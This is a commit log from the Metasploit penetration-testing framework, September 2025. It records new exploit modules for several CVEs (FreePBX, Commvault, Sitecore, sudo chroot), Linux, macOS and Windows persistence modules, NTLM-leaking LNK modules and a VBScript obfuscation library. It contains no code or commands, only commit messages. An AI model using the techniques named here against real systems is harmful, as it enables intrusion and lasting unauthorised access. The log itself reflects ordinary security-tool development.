Martin Sutovsky 042cdb7a60 Code cleanup, adds Faker, fixing SMB server 2025-09-29 10:55:10 +02:00
Martin Sutovsky 82e2f03c23 Fixes ZDI reference, code cleanup 2025-09-29 10:13:37 +02:00
Martin Sutovsky d21f7917a9 Fixes regex 2025-09-29 10:01:24 +02:00
jenkins-metasploit a849571502 automatic module_metadata_base.json update 2025-09-29 07:44:10 +00:00
Martin Sutovsky 7b4bb55e12 Rubocopes 2025-09-29 09:41:10 +02:00
msutovsky-r7 a23473a103 Land #20565, moves image exec module to persistence category and mixin
Modern persistence image exec
2025-09-29 09:32:25 +02:00
h00die 81d8d46166 peer review 2025-09-26 15:44:31 -04:00
jenkins-metasploit 20c8708c96 automatic module_metadata_base.json update 2025-09-26 14:06:43 +00:00
msutovsky-r7 79ff667d5e Land #20538, adds systemd override persistence module
persistence: systemd service override
2025-09-26 15:57:31 +02:00
dledda-r7 889941487b fix: fix logic for split stdapi loading 2025-09-26 09:43:20 -04:00
jenkins-metasploit 95bc7a4599 automatic module_metadata_base.json update 2025-09-26 13:02:18 +00:00
Martin Sutovsky 00f902b04b Adds formatting to cleanup commands 2025-09-26 15:00:09 +02:00
Spencer McIntyre 3d1d49b71a Merge pull request #20517 from cgranleese-r7/adds-postgres-ssl-support
Adds SSL support to the postgres_login module
2025-09-26 08:53:47 -04:00
dledda-r7 dd802fa8a6 fix: fix mettle stdapi split regression 2025-09-26 06:54:24 -04:00
dledda-r7 48e8d40701 fix: update meterpreter stageless cached size 2025-09-26 06:11:40 -04:00
dledda-r7 0a2707b8af fix: update meterpreter stageless cached size 2025-09-26 03:54:58 -04:00
happybear-21 8cfc2ae723 ixed: issues, updated requested changes (files: specialfolder_leak.rb, environment_variable_datablock_leak.rb, icon_environment_datablock_leak.rb) 2025-09-26 11:05:39 +05:30
h00die 09475fc2b9 peer review 2025-09-25 16:38:50 -04:00
Jack Heysel 7b3c82f2e6 Responded to comments 2025-09-25 13:35:41 -07:00
bcoles bbc9928a75 exploit/windows/fileformat/windows_script_host_vbscript: Use VBSObfuscate 2025-09-26 03:06:37 +10:00
bcoles 5b0565a4a1 Msf::Exploit::VBSObfuscate: Add VBS obfuscation library 2025-09-26 03:06:20 +10:00
Martin Sutovsky a91f5f53f2 Substitutes cmd_exec with mkdir to create_process 2025-09-25 18:20:54 +02:00
adfoster-r7 070bf7f287 Merge pull request #20555 from bwatters-r7/spec/add-x64-meterp-acc-tests
add x64 acceptance tests, and use single, release payload
2025-09-25 15:40:51 +01:00
dledda-r7 0b1ec457b1 feat: bump metasploit-payloads 2025-09-25 10:27:05 -04:00
jenkins-metasploit 7f88110032 automatic module_metadata_base.json update 2025-09-25 10:58:08 +00:00
msutovsky-r7 86381a6394 Land #20412, swaps to psh_exec in powershell/exec_powershell
Remove errant write_log call and swap to the all-in-one psh_exec rath…
2025-09-25 12:49:33 +02:00
adfoster-r7 391e4e22f6 Merge pull request #20567 from bcoles/rex-exploitation
bump rex-exploitation gem from 0.1.41 to 0.1.44
2025-09-25 10:08:40 +01:00
cgranleese-r7 40f6e2ca60 Updates test to cover SSL support 2025-09-25 09:48:44 +01:00
Metasploit c4b7d9b42f Bump version of framework to 6.4.91 2025-09-25 03:32:30 -05:00
futileskills 046c1338e2 Fix NameError by correcting Msf namespace 2025-09-24 12:50:09 -05:00
happybear-21 ae3b548be6 fixed: issues, updated requested changes (file: datablock_padding_lnk.rb) 2025-09-24 21:56:14 +05:30
adfoster-r7 40c32a2599 Merge pull request #20561 from cgranleese-r7/fixes-report-note-warning-when-no-data-key
Fixes deprecation message logic when no `data` object present
2025-09-24 14:29:45 +01:00
adfoster-r7 13b6c6eb98 Add named variable
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2025-09-24 13:57:39 +01:00
Jack Heysel e9ab1d0839 Update esc_update_ldap module so shadow creds not required 2025-09-23 14:37:55 -07:00
h00die 915cad72b5 modern persistence for windows image_exec_options 2025-09-23 17:25:27 -04:00
h00die 2b16a23436 Update modules/exploits/osx/persistence/launch_plist.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-09-23 16:59:26 -04:00
h00die e855938ff8 persistence suggester 2025-09-23 16:40:43 -04:00
h00die 01a07ac9a1 modernizing windows persistence 2025-09-23 16:39:56 -04:00
bcoles 6d693c8586 bump rex-exploitation gem from 0.1.41 to 0.1.44 2025-09-24 05:11:51 +10:00
jenkins-metasploit 74de3c7314 automatic module_metadata_base.json update 2025-09-23 15:44:11 +00:00
Brendan a1e3e1545b Merge pull request #20562 from uhei/fix/weblogic-regex
fix: WebLogic server detection regex
2025-09-23 10:35:19 -05:00
msutovsky-r7 1a84744f15 Land #20557, fixes ActiveRecord error in reporting failure for file-based/multi-value RHOSTS
Fix ActiveRecord error when reporting failures with file-based RHOSTS
2025-09-23 16:28:10 +02:00
Martin Sutovsky 5260da1867 Removes redundant variables 2025-09-23 16:22:40 +02:00
Martin Sutovsky 6e01e7a5f6 Minor code changes 2025-09-23 16:16:41 +02:00
jenkins-metasploit 468b1027f3 automatic module_metadata_base.json update 2025-09-23 11:51:53 +00:00
msutovsky-r7 13b3e20a6b Land #20559, adds FreePBX unauthenticated SQLi to RCE module (CVE-2025-57819)
Add FreePBX Unauthenticated SQLi to RCE (CVE-2025-57819)
2025-09-23 13:38:44 +02:00
futileskills 7627bd177e Simplify module options and logic 2025-09-23 06:19:42 -05:00
Uli Heilmeier 5af0dd3357 fix: WebLogic server detection regex
Some WebLogic server versions reports their version with a dash
between 'Server' and 'Version', like
'<p id="footerVersion">WebLogic Server-Version: 12.2.1.3.0</p>'
2025-09-23 09:58:50 +02:00
cgranleese-r7 a4f9dc7f13 Fixes deprecation message logic when no data object present 2025-09-23 08:38:14 +01:00
Brendan 052fdb7234 Merge pull request #20512 from cdelafuente-r7/fix_native_wth_gcc15
Fix issue with native extensions and GCC 15
2025-09-22 15:37:08 -05:00
Brendan e6e7a455e5 Merge pull request #20540 from Chocapikk/tips
Add new helpful tips to COMMON_TIPS for better usability
2025-09-22 13:25:59 -05:00
Echo_Slow b51cc87f88 Update freepbx_unauth_sqli_to_rce.rb
Performed manual cleanup by observing the error log of msftidy.  Checked for original functionality, the exploit still works.
2025-09-22 17:34:00 +02:00
Echo_Slow 6b183ba3b4 Update freepbx_unauth_sqli_to_rce.rb
Used rubocop -A option
2025-09-22 16:49:19 +02:00
Echo_Slow 9c901e7a46 Merge branch 'freepbx_unauth_sqli_to_rce' of https://github.com/EchoSl0w/metasploit-framework into freepbx_unauth_sqli_to_rce 2025-09-22 16:47:34 +02:00
Echo_Slow a1973e9f72 Update freepbx_unauth_sqli_to_rce.rb
Used rubocop with -A option.
2025-09-22 16:45:29 +02:00
Echo_Slow c0f4efd87d Update modules/exploits/unix/http/freepbx_unauth_sqli_to_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-22 16:42:22 +02:00
cgranleese-r7 13c3f4349d Adds exception and change SSL socket initialisation 2025-09-22 14:57:46 +01:00
Echo_Slow 09207eb450 Update freepbx_unauth_sqli_to_rce.rb to account for slow systems 2025-09-22 13:18:32 +02:00
Echo_Slow b54dfddc25 Update modules/exploits/unix/http/freepbx_unauth_sqli_to_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-09-22 13:17:28 +02:00
Echo_Slow 75c8efbc7d Update freepbx_unauth_sqli_to_rce.rb
Made the code more readable
2025-09-22 11:26:11 +02:00
Echo_Slow 19074eef02 Add exploit for CVE-2025-57819
Added an exploit script for unauthenticated remote code execution targeting FreePBX
2025-09-21 22:56:19 +02:00
futileskills e7e40d3eeb rubocop fixes 2025-09-20 00:50:07 -05:00
FutileSkills fb3b4c1f2d Update escpos_tcp_command_injector.rb
Added Notes Section to satisfy rubocop
2025-09-20 00:42:59 -05:00
FutileSkills 02c5abf9c3 Merge branch 'rapid7:master' into escpos-injector-module 2025-09-20 00:33:26 -05:00
Jeff McJunkin 893a4a5c98 failure.rb: Make comments accurate again 2025-09-19 14:47:03 -07:00
Jeff McJunkin 094fa8191a Update lib/msf/core/module/failure.rb
Per @smcintyre-r7's suggestion, which is a damned good one.

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2025-09-19 14:45:33 -07:00
Jeff McJunkin 1dc1a24f73 Improve RHOST validation logic inside report_failure 2025-09-19 14:30:27 -07:00
Jeff McJunkin 4b2a354d21 Prevent file: paths from being saved as host addresses in report_failure
Added check to prevent saving file paths as host addresses.
2025-09-19 14:07:32 -07:00
h00die ae2f7d8de1 better cleanup for launch_plist 2025-09-19 13:42:15 -04:00
h00die d2af76cdd0 update plist persistence to mixin 2025-09-19 13:42:14 -04:00
jenkins-metasploit a496ad0ac7 automatic module_metadata_base.json update 2025-09-18 20:48:23 +00:00
jheysel-r7 8b539f7e96 Merge pull request #20524 from h00die/modern_persistence_yum
update yum to persistence module
2025-09-18 13:39:57 -07:00
h00die 6c5522cdba Update documentation/modules/exploit/linux/persistence/init_systemd_override.md
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-09-18 16:25:54 -04:00
h00die 160cf5c55b peer review for yum persistence 2025-09-18 16:15:24 -04:00
Spencer McIntyre ed88e5397c Merge pull request #20553 from BenoitDePaoli/fix/userpass_password_persistence
fix: ensure USERPASS_FILE credentials store password (set private_type)
2025-09-18 15:39:08 -04:00
h00die 15f4abd1b2 update yum to persistence module 2025-09-18 15:36:44 -04:00
jenkins-metasploit dbc7af30b7 automatic module_metadata_base.json update 2025-09-18 16:05:00 +00:00
Spencer McIntyre cf3abc280e Merge pull request #20533 from cdelafuente-r7/feat/mitre/add_ref
Add T1003 "OS credential dumping" MITRE technique reference
2025-09-18 11:56:33 -04:00
happybear-21 f844377d58 added: documentation 2025-09-18 21:10:23 +05:30
jenkins-metasploit 05273263c9 automatic module_metadata_base.json update 2025-09-18 10:13:16 +00:00
Diego Ledda c718a965d7 Merge pull request #20508 from h00die/modern_persistence_cron
update cron to persistence mixin
2025-09-18 12:04:00 +02:00
Diego Ledda cb2f3992de chore: fix white-space issue 2025-09-18 11:48:17 +02:00
Metasploit c1b9cc7150 Bump version of framework to 6.4.90 2025-09-18 03:32:20 -05:00
h00die 6ddaa076c1 Apply suggestions from code review
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2025-09-17 15:41:25 -04:00
bwatters-r7 1891ebef87 add x64 acceptance tests, and use single, release payload 2025-09-17 12:21:30 -05:00
cgranleese-r7 f26c14f05a Address PR feedback 2025-09-17 15:38:08 +01:00
BenoitDePaoli 08c43670ff fix: ensure USERPASS_FILE credentials store password (set private_type) 2025-09-17 15:42:03 +02:00
jenkins-metasploit 99c24c37f2 automatic module_metadata_base.json update 2025-09-17 13:29:46 +00:00
Diego Ledda 448381ee96 Merge pull request #20548 from xHector1337/fix-exploits/linux/samba/is_known_pipename.rb
Fixes samba share iteration in linux/samba/is_known_pipename
2025-09-17 15:21:27 +02:00
Diego Ledda b5b1ac237a Update is_known_pipename.rb 2025-09-17 11:04:28 +02:00
jenkins-metasploit a333c81338 automatic module_metadata_base.json update 2025-09-17 08:06:57 +00:00
msutovsky-r7 dc8d67538c Land #20536, adds docker image persistence module
docker image persistence module
2025-09-17 09:56:16 +02:00
jenkins-metasploit 076fd0cc45 automatic module_metadata_base.json update 2025-09-16 22:06:51 +00:00
jheysel-r7 81ce0f8868 Merge pull request #20521 from h00die/modern_persistence_systemd
update systemd to persistence mixin
2025-09-16 14:56:26 -07:00
jenkins-metasploit 5394ff4b1b automatic module_metadata_base.json update 2025-09-16 20:30:50 +00:00
jheysel-r7 58dfd4d0ca Merge pull request #20507 from remmons-r7/commvault_rce_cve_2025_57790_cve_2025_57791
Exploit Module for CVE-2025-57790/CVE-2025-57791 - Commvault Unauthenticated RCE
2025-09-16 13:22:18 -07:00
h00die 73c6ed2528 peer review for init_systemd_override persistence 2025-09-16 16:08:30 -04:00
h00die 93bc79e87d peer review for docker_image persistence 2025-09-16 15:57:24 -04:00
Muzaffer Umut ŞAHİN 7c5fce6872 Add nill check logic 2025-09-16 19:49:55 +03:00
Christophe De La Fuente 788b9c27b4 Use sub-technique and add missing modules 2025-09-16 18:39:23 +02:00
msutovsky-r7 5eecb1feac Land #20535, adds a test login scanner and fixes ANONYMOUS_LOGIN
Add a test login scanner and fix ANONYMOUS_LOGIN
2025-09-16 16:51:26 +02:00
jenkins-metasploit 76977aeb61 automatic module_metadata_base.json update 2025-09-16 13:06:52 +00:00
msutovsky-r7 32aa0d84e4 Land #20525, moves obsidian plugin module to persistence category and mixin
update obsidian to persistence mixin
2025-09-16 14:58:15 +02:00
jenkins-metasploit 555423b2eb automatic module_metadata_base.json update 2025-09-15 23:04:23 +00:00
jheysel-r7 02e35f7e92 Merge pull request #20520 from h00die/modern_persistence_openrc
update openrc to persistence mixin
2025-09-15 15:54:31 -07:00
h00die ebe0234ddb Update documentation/modules/exploit/linux/persistence/init_openrc.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-09-15 16:30:17 -04:00
jenkins-metasploit ab1dd8787c automatic module_metadata_base.json update 2025-09-15 19:56:40 +00:00
Brendan 1ec10ec877 Merge pull request #20510 from h00die/modern_persistence_rc_local
update rc_local to persistence mixin
2025-09-15 14:47:48 -05:00
Spencer McIntyre a538a8ea14 Merge pull request #20483 from dledda-r7/fix/update-metasploit-payloads-runner
Update CI for meterpreter vs2022
2025-09-15 15:43:16 -04:00
remmons-r7 eddc81f10c Update commvault_rce_cve_2025_57790_cve_2025_57791.md
Update the example usage terminal output to reflect module changes.
2025-09-15 11:37:57 -05:00
remmons-r7 12b78c086d Update commvault_rce_cve_2025_57790_cve_2025_57791.rb
Remove an empty line that msftidy doesn't like
2025-09-15 11:19:49 -05:00
remmons-r7 ddc5abf20c Update commvault_rce_cve_2025_57790_cve_2025_57791.rb
Remove a commented out line that isn't needed.
2025-09-15 10:56:30 -05:00
remmons-r7 bb3a26cff1 Implement peer review suggestions for Commvault module
Implementing commvault_rce_cve_2025_57790_cve_2025_57791.rb changes from peer review.
2025-09-15 10:54:34 -05:00
remmons-r7 b754b7027c Merge branch 'rapid7:master' into commvault_rce_cve_2025_57790_cve_2025_57791 2025-09-15 10:47:38 -05:00
remmons-r7 c20dd394ab Merge branch 'rapid7:master' into master 2025-09-15 10:47:23 -05:00
dledda-r7 20345c2234 fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 10:12:45 -04:00
dledda-r7 7be73c59e9 fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 09:33:54 -04:00
dledda-r7 b30c3e32c6 fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 08:53:39 -04:00
dledda-r7 85c65bd48f fix: replace Start-Process with Invoke-Command in meterpreter acceptance 2025-09-15 08:04:35 -04:00
happybear-21 aa264f59d4 fixed: rubocop offenses (file: specialfolder_leak.rb) 2025-09-14 23:45:32 +05:30
happybear-21 2ea4f7cdb0 fixed: rubocop offenses (file: icon_environment_datablock_leak.rb) 2025-09-14 23:35:46 +05:30
happybear-21 97495cdaa4 fixed: rubocop offenses 2025-09-14 23:28:17 +05:30
happybear-21 65549ba868 added: smb share server, completed: requested change 2025-09-14 15:43:58 +05:30
happybear-21 5a82ea53b9 added: smb for lateral movement, updated: description and icon_path as optional, used: faker module to generate data 2025-09-14 15:34:26 +05:30
happybear-21 3aa18b1541 updated: description and icon_path as optional, added: faker module to generate description and icon_path, fixed: minor changes 2025-09-14 15:19:05 +05:30
jenkins-metasploit 8ad35c0534 automatic module_metadata_base.json update 2025-09-12 23:27:45 +00:00
jheysel-r7 b45a3caaa5 Merge pull request #20509 from h00die/modern_persistence_motd
update motd to persistence mixin
2025-09-12 16:18:08 -07:00
Metasploit 831912a81b Bump version of framework to 6.4.89 2025-09-12 16:38:50 -05:00
jenkins-metasploit 4328e9951f automatic module_metadata_base.json update 2025-09-12 21:22:03 +00:00
jheysel-r7 e473c08b61 Merge pull request #20542 from zeroSteiner/fix/smb-kerberos-login-exp
Fix a Kerberos Error Edge Case When Logging In
2025-09-12 14:13:54 -07:00
Spencer McIntyre c27138a5bf Filter for an edge case in response codes 2025-09-12 16:49:49 -04:00
Spencer McIntyre 829166def4 Fix a regression in smb_login 2025-09-12 16:49:46 -04:00
jenkins-metasploit 3f1698f209 automatic module_metadata_base.json update 2025-09-12 19:56:02 +00:00
jheysel-r7 796404c1d7 Merge pull request #20541 from zeroSteiner/fix/smb-login-nil-passwords
Fix a regression in smb_login
2025-09-12 12:42:19 -07:00
Spencer McIntyre 3e396ce31f Deregister KrbCacheMode because it's ignored 2025-09-12 15:11:23 -04:00
Spencer McIntyre 5d748b9ba3 Fix a regression in smb_login 2025-09-12 14:27:32 -04:00
Chocapikk 93472898ce Add new helpful tips to COMMON_TIPS for better usability 2025-09-12 19:49:45 +02:00
Spencer McIntyre 59f1dd4879 Merge pull request #20529 from bwatters-r7/docs/update-contributing
Add section on Vibecoding and AI/LLM
2025-09-12 13:01:26 -04:00
jenkins-metasploit dbc7867dd7 automatic module_metadata_base.json update 2025-09-12 12:49:27 +00:00
msutovsky-r7 c901b5a306 Land #20526, moves at_persistence to persistence category and mixin
Modern persistence: at
2025-09-12 14:41:00 +02:00
mwalas-r7 d3d2950e80 Merge pull request #20537 from zeroSteiner/fix/null-cache-path
Check the path is set before checking the file exists
2025-09-12 05:18:37 -07:00
h00die 5abe0f57b7 Update documentation/modules/exploit/multi/persistence/at.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-12 14:13:27 +02:00
h00die 15cdbfac2e update at persistence to use attck ref 2025-09-12 14:13:26 +02:00
h00die fd1d70ef93 update at persistence to mixin 2025-09-12 14:13:26 +02:00
h00die 403d02698b systemd service override persistence 2025-09-11 17:29:13 -04:00
jenkins-metasploit cc48f38e21 automatic module_metadata_base.json update 2025-09-11 18:34:00 +00:00
jheysel-r7 96a83143f1 Merge pull request #20479 from msutovsky-r7/exploit/sitecore/postauth-rce
Adds modules for Sitecore XP post-auth remote code executions (CVE-2025-34510, CVE-2025-34511)
2025-09-11 11:25:27 -07:00
jenkins-metasploit dd7c491d9e automatic module_metadata_base.json update 2025-09-11 17:06:52 +00:00
Diego Ledda 985af001d2 Merge pull request #20497 from h00die/modern_persistence_autostart
update autostart to persistence mixin
2025-09-11 18:58:32 +02:00
jheysel-r7 a3a1e146f0 Apply suggestions from code review 2025-09-11 09:40:34 -07:00
Spencer McIntyre e197f532db Check the path is set before checking the file exists 2025-09-11 12:35:30 -04:00
h00die bce1a19927 Update modules/exploits/linux/persistence/init_openrc.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-11 12:00:52 -04:00
h00die 00115457f7 Update documentation/modules/exploit/linux/persistence/init_upstart.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-11 12:00:28 -04:00
h00die 5c52151a06 Update documentation/modules/exploit/linux/persistence/init_upstart.md
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-09-11 12:00:22 -04:00
jenkins-metasploit 947a0ed339 automatic module_metadata_base.json update 2025-09-11 14:54:10 +00:00
Spencer McIntyre afdaf4ff39 Merge pull request #20514 from dledda-r7/fix/remove-unhook-autoload
Removing unhook extension autoload
2025-09-11 10:45:39 -04:00
Martin Sutovsky 5ab864b9b1 Uses between? for version check, clearer webshell upload 2025-09-11 11:04:34 +02:00
Diego Ledda 80c5e41650 Merge pull request #20495 from h00die/modern_persistence_apt
update apt_package_manager to persistence mixin
2025-09-11 10:49:08 +02:00
Martin Sutovsky 00bd70751c Updates docs 2025-09-11 10:41:28 +02:00
Metasploit f494b9871a Bump version of framework to 6.4.88 2025-09-11 03:32:35 -05:00
h00die 71e9602eba Update modules/exploits/linux/persistence/autostart.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2025-09-10 13:59:23 -04:00
h00die 2bf5264aff docker image persistence module 2025-09-10 13:45:22 -04:00
Diego Ledda 4104497498 Merge pull request #20502 from zeroSteiner/feat/refactor-pe-compiling
Update PE EXE Templates
2025-09-10 12:37:35 +02:00
jenkins-metasploit 1fe1512596 automatic module_metadata_base.json update 2025-09-10 08:23:55 +00:00
Diego Ledda 1314f5d0bb Merge pull request #20455 from Chocapikk/aitemi_m300_time_rce
Add unauthenticated RCE on Shenzhen Aitemi M300 MT02 (CVE-2025-34152)
2025-09-10 10:12:41 +02:00
h00die 489e0ca404 docker image persistence module draft 2025-09-09 22:53:06 -04:00
h00die adde043c22 upstart updated with mixin udpates 2025-09-09 17:03:25 -04:00
h00die b9534ffbe4 use attck ref in upstart persistence module 2025-09-09 17:03:25 -04:00
h00die ccd1fe3d78 update upstart to persistence mixin 2025-09-09 17:03:25 -04:00
h00die e3cad5b772 systemd updated with mixin udpates 2025-09-09 16:19:41 -04:00
h00die 296961137e use attck ref in systemd persistence module 2025-09-09 16:19:41 -04:00
h00die f240fed592 use attck ref in systemd persistence module 2025-09-09 16:19:41 -04:00
h00die 8b6aede3e4 update systemd to persistence mixin 2025-09-09 16:19:41 -04:00
h00die 16e407fa47 rc_local updated with mixin udpates 2025-09-09 15:42:46 -04:00
h00die 945fd8feb1 use attck ref in openrc persistence module 2025-09-09 15:42:46 -04:00
h00die c2ca191711 update openrc to persistence mixin 2025-09-09 15:42:46 -04:00
h00die 2bd3ea0e6a rc_local updated with mixin udpates 2025-09-09 14:58:09 -04:00
h00die feb4c6f855 rc_local updated with mixin udpates 2025-09-09 14:35:35 -04:00
h00die e0f350f294 update rc_local to persistence mixin 2025-09-09 14:35:35 -04:00
h00die 8bc611465b motd updated with mixin udpates 2025-09-09 14:29:29 -04:00
h00die e1e4e43535 update motd to persistence mixin 2025-09-09 14:29:29 -04:00
Spencer McIntyre 1bd44fa485 Set the anonymous_login option 2025-09-09 13:52:47 -04:00
Spencer McIntyre 30cfc5dbb0 Add a module for testing credential collections 2025-09-09 13:50:55 -04:00
h00die e79c10ac66 cron updated with mixin udpates 2025-09-09 11:55:19 -04:00
h00die 9e461ea875 switch to attck ref 2025-09-09 11:50:31 -04:00
h00die 785397bb0c cron to multi with persistence mixin 2025-09-09 11:50:31 -04:00
h00die c4d03023fc autostart updated with mixin udpates 2025-09-09 11:47:13 -04:00
h00die fb29084f86 persistence autostart cleanup updates 2025-09-09 10:49:56 -04:00
h00die c3be5ad23c update autostart to persistence mixin 2025-09-09 10:49:56 -04:00
jenkins-metasploit b650776c83 automatic module_metadata_base.json update 2025-09-09 14:36:48 +00:00
h00die 638beeb738 apt persistence updates for mixin 2025-09-09 10:33:10 -04:00
h00die 711d8d0896 persistence apt cleanup updates 2025-09-09 10:28:03 -04:00
h00die db2f9f7792 update apt_package_manager to persistence mixin 2025-09-09 10:28:03 -04:00
Diego Ledda 140232da2c Merge pull request #20534 from h00die/persistence_lib_fixes
adjustments to the persistence lib and landed modules
2025-09-09 16:25:24 +02:00
h00die c4936d1b0f adjustments to the persistence lib and modules 2025-09-09 10:02:06 -04:00
jenkins-metasploit 6df1871523 automatic module_metadata_base.json update 2025-09-09 13:51:25 +00:00
cgranleese-r7 2f27fe4ed5 Merge pull request #19653 from Mathiou04/fix_bugs_in_credentials_collection_enumerator_and_refacto
Fixing multiple bugs in credential generation + refactoring
2025-09-09 14:42:12 +01:00
cgranleese-r7 dbb631ffb6 Adds SSL support to the postgres_login module 2025-09-09 09:56:36 +01:00
Christophe De La Fuente 7ce2bdc979 Add T1003 "OS credential dumping" MITRE technique 2025-09-09 10:45:46 +02:00
jenkins-metasploit 704a8f10b8 automatic module_metadata_base.json update 2025-09-08 23:57:37 +00:00
jheysel-r7 7972017936 Merge pull request #20397 from vognik/CVE-2025-34300
Add Lighthouse Studio unauthenticated RCE (CVE-2025-34300)
2025-09-08 16:48:29 -07:00
jheysel-r7 0e325e6217 Update documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md 2025-09-08 16:29:00 -07:00
Mathieu 736d89bc2c Update the CredentialCollectionSpecs
CredentialCollection: adding various tests that currently fails to demonstrate multiple bugs in the each method

Fix incorrect expectations of currently failing tests

Inline all specs to avoid nesting context

Reverts some test expectations

Some final tidy up

Re-revert tests expectations
2025-09-08 13:09:51 -04:00
Mathieu 4b97240eca Fixes for the CredentialCollection
Fixes trivial bugs when combining additional_publics with user_as_pass

Fixes the fact that no nil credential is generated for additional_publics

Re-implement the each_unfiltered_password_first method (used in case of password spraying) to make all tests pass

First refactoring pass in order to dry the code that iterates on passwords and usernames
2025-09-08 13:08:02 -04:00
Mathieu 14bc1f14fc Change how ldap_login generate its specific credentials for SCHANNEL && KERBEROS auth 2025-09-08 13:02:30 -04:00
Diego Ledda 68940822fd Merge pull request #20494 from h00die/modern_persistence_example
add example linux persistence module
2025-09-08 16:23:20 +02:00
h00die 5c1673bb20 update obsidian to persistence mixin 2025-09-06 15:05:21 -04:00
remmons-r7 8ffc9a3db4 Update commvault_rce_cve_2025_57790_cve_2025_57791.md
Updating module type from "multi" to "windows" in documentation :)
2025-09-05 23:13:10 -05:00
remmons-r7 00114142ff Delete modules/exploits/multi/http/commvault_rce_cve_2025_57790_cve_2025_57791.rb 2025-09-05 23:10:39 -05:00
remmons-r7 e1b6249c23 Delete documentation/modules/exploit/multi/http/commvault_rce_cve_2025_57790_cve_2025_57791.md 2025-09-05 23:09:51 -05:00
remmons-r7 e661388ce6 Revise and move commvault_rce_cve_2025_57790_cve_2025_57791.md
New documentation for the Commvault CVE-2025-57790/CVE-2025-57791 RCE module, updated to reflect module changes.
2025-09-05 23:06:16 -05:00
remmons-r7 be546af7c0 Revise and move commvault_rce_cve_2025_57790_cve_2025_57791.rb
Revised initial module and moved it to windows instead of multi.
2025-09-05 23:04:02 -05:00
remmons-r7 3f7512ba62 Merge branch 'rapid7:master' into commvault_rce_cve_2025_57790_cve_2025_57791 2025-09-05 23:02:01 -05:00
remmons-r7 2bb0deb224 Merge branch 'rapid7:master' into master 2025-09-05 22:59:32 -05:00
bwatters-r7 c40e4cc8bc Add section on Vibecoding and AI/LLM 2025-09-05 15:15:56 -05:00
Diego Ledda 4ede319b0a fix: review changes 2025-09-05 15:21:49 +02:00
adfoster-r7 5fedbe026b Merge pull request #20519 from cgranleese-r7/adds-base-sessions-path-to-meterpreter-workflow-paths
Adds `lib/msf/base/sessions` path to Meterpreter acceptance workflow paths
2025-09-05 13:07:55 +01:00
cgranleese-r7 0966954549 Adds lib/msf/base/sessions to meterpreter acceptance workflow paths 2025-09-05 07:10:40 +01:00
happybear-21 600ad5777a Issue: #20223
Added Metasploit Auxiliary Module:
[x] Environment Variable Data Block NTLM Leak
[x] Icon Environment Data Block NTLM Leak
[x] Special Folder Data Block NTLM Leak
[x] Windows LNK Padding

Ref:
https://github.com/nafiez/DataBlockNTLMLeak/tree/main
2025-09-05 10:49:08 +05:30
jenkins-metasploit db80e8173a automatic module_metadata_base.json update 2025-09-04 17:31:17 +00:00
Spencer McIntyre e07d174011 Merge pull request #20511 from mwalas-r7/fix/sni-support-for-ssl-scanner
Added SNI support for the ssl_version scanner
2025-09-04 13:22:57 -04:00
Marcin Walas 9fb4966e52 Added SNI support for ssl scanner 2025-09-04 16:12:31 +02:00
Diego Ledda 55d8a3f33c fix: adding issue reference 2025-09-04 14:36:55 +02:00
dwelch-r7 2ca14c900b Merge pull request #20516 from adfoster-r7/fix-msfdb-init-failures-on-nixos
Fix msfdb init failures on NixOs
2025-09-04 12:25:18 +01:00
adfoster-r7 ce3dc123f9 Fix msfdb init failures on nixos 2025-09-04 11:41:30 +01:00
Metasploit 9beacd1980 Bump version of framework to 6.4.87 2025-09-04 03:32:48 -05:00
jenkins-metasploit ef61041ae1 automatic module_metadata_base.json update 2025-09-03 22:03:28 +00:00
Brendan da7224ed1b Merge pull request #20376 from msutovsky-r7/exploit/sudo-chroot-privesc
Adds module for sudo chroot LPE (CVE-2025-32463)
2025-09-03 16:53:43 -05:00
adfoster-r7 0bc993b9ca Merge pull request #20513 from rapid7/revert-20444-adds-survey-banner-docs-site
Revert "Adds survey banner to the docs site"
2025-09-03 16:29:45 +01:00
dledda-r7 96c6a14e95 fix: removing unhook extension autoload 2025-09-03 11:22:02 -04:00
cgranleese-r7 be01d0578b Revert "Adds survey banner to the docs site" 2025-09-03 16:11:00 +01:00
Christophe De La Fuente 4f606bc216 Bump bson and ed25519 versions 2025-09-03 16:27:00 +02:00
remmons-r7 b360d5edc3 Create commvault_rce_cve_2025_57790_cve_2025_57791.md 2025-09-02 15:43:22 -05:00
remmons-r7 a07203c14e Create commvault_rce_cve_2025_57790_cve_2025_57791.rb 2025-09-02 15:39:29 -05:00
jenkins-metasploit 9efd3c3c79 automatic module_metadata_base.json update 2025-09-02 14:07:19 +00:00
msutovsky-r7 657280b4b8 Land #20505, adds fix for sap_router_portscanner module
fix output of `sap_router_portscanner` that causes module crash
2025-09-02 15:56:59 +02:00
jenkins-metasploit b3176f0274 automatic module_metadata_base.json update 2025-09-02 12:40:28 +00:00
msutovsky-r7 7820c6caec Land #20504, moves bash_profile module to persistence category
update bash_profile to persistence mixin
2025-09-02 14:31:42 +02:00
adfoster-r7 3d6993d4ba Merge pull request #20500 from cgranleese-r7/fixes-docker-invalid-uri-error
Fixes database name stripping
2025-09-02 12:42:53 +01:00
randomstr1ng 0fe22ead4f Fix table output to use print_line instead of print in
sap_router_port_scanner
2025-09-02 10:05:42 +02:00
randomstr1ng a2f02dc376 fix output issue off sap_router_portscanner module 2025-09-02 10:04:46 +02:00
h00die 56c692fc3e example persistence cleanup updates 2025-09-01 19:34:57 -04:00
